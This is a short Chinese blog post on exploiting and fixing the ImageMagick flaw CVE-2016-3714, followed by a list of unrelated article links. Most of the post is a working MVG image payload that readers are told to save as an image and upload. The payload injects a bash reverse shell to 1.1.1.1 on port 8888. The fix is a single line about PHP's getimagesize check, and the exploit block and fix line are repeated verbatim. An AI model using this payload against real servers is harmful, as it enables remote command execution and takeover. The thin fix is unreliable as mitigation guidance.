ImageMagick漏洞(cve-2016-3714)利用及修复
2016-05-05 17:09
555 查看
利用:
如下内容保存为图片格式上传即可(命令部分自行替换)
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context
修复(php):
上传时先利用getimagesize函数检查是否为正常图片
如下内容保存为图片格式上传即可(命令部分自行替换)
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context
修复(php):
上传时先利用getimagesize函数检查是否为正常图片
相关文章推荐
- 数据分析能力的8个等级
- 用Illustrator画填充圆环
- C#调用存储过程
- ReentrantLock实现探究
- ubuntu下配置php开发环境(linux)
- HttpClient4.5.2通过POST发送XML
- tableView的系统删除和点击删除
- 小何讲Linux: 底层文件I/O操作
- 自定义的DataPicker和TimePicker(日期选择器和时间选择器)
- Hadoop全分布式配置(2个节点)
- 剑指offer-面试题62:序列化二叉树
- Android挂断电话以及Java Class Loader
- 回文链表
- 如何保证编码规范
- list对象只取某个字段组成list<string>,取list的交集
- WSAAsyncSelect基于异步通知的网络socket通信案例一
- AnimatorOverrideController
- 为什么Nginx的性能要比Apache高很多
- Linux: grep多个关键字“与”和“或”
- eclipse提示功能错乱